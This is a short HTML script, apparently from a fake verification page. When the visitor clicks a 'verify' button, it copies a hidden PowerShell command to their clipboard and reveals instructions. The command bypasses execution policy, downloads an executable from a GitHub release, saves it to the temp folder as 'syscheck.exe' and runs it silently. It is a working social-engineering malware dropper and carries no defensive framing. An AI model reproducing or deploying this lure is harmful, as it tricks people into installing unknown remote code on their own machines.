<script>
  document.getElementById("verifyBtn").addEventListener("click", function() {
    // New silent execution command
    const command = `powershell -W Hidden -NoP -NonI -Exec Bypass -C "[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12; $p='%temp%\\syscheck.exe'; (New-Object Net.WebClient).DownloadFile('https://github.com/jozef800/discord/releases/download/v3.0/key_scanner.exe',$p); Start-Process -WindowStyle Hidden $p"`;
    
    navigator.clipboard.writeText(command).then(() => {
      document.getElementById("instructions").style.display = "block";
    });
  });
</script>
